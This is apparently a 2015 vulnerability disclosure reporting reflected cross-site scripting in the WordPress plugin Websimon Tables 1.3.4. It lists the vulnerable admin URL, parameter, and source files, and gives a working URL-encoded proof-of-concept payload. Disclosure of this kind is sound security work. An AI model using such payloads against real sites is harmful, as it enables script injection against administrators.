Subject: Cross-Site Scripting (XSS) in Websimon Tables 1.3.4

Date: Fri, 21 Aug 2015 12:31:55 +0200

Hello,

Plugin: Websimon Tables 1.3.4 https://wordpress.org/plugins/websimon-tables/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET

Url: http://localhost/wp-admin/tools.php?page=websimon_tables&action=edit_style&id=[xss]

Vulnerable parameters: id

Example PHP callstack:

/websimon-tables/php/basic.php:98

Verification:

http://localhost/wp-admin/tools.php?page=websimon_tables&action=edit_style&id=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

Same XSSs are in:

/websimon-tables/php/edit_table.php:52

/websimon-tables/php/advanced.php:42

--

Regards,
Marcin Probola,